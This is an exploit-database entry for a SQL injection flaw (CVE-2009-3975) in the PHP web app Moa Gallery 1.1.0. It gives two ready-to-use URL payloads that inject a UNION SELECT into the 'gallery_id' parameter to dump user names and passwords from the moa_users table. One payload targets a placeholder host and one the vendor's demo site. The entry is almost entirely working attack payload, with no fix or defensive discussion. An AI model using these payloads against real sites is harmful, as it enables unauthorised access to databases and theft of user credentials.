Moa Gallery 1.1.0 - 'gallery_id' SQL Injection

Author: Mr.tro0oqy
type: webapps
platform: php
port: 
date_added: 2009-08-23 
date_updated:  
verified: 1 
codes: OSVDB-57344;CVE-2009-3975 
tags: 
aliases:  
screenshot_url:  
application_url: 

======================================================================
[»] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln

[»] Language : php

[»] Download : http://sourceforge.net/projects/moagallery/

[»] Script site : http://www.moagallery.net/

[»] Founder: Mr.tro0oqy <- from Yemen

[»] Gr44tz to: [H]-> borken heart :(

[»] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------

http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--

--------
demo:
--------

http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--

# milw0rm.com [2009-08-24]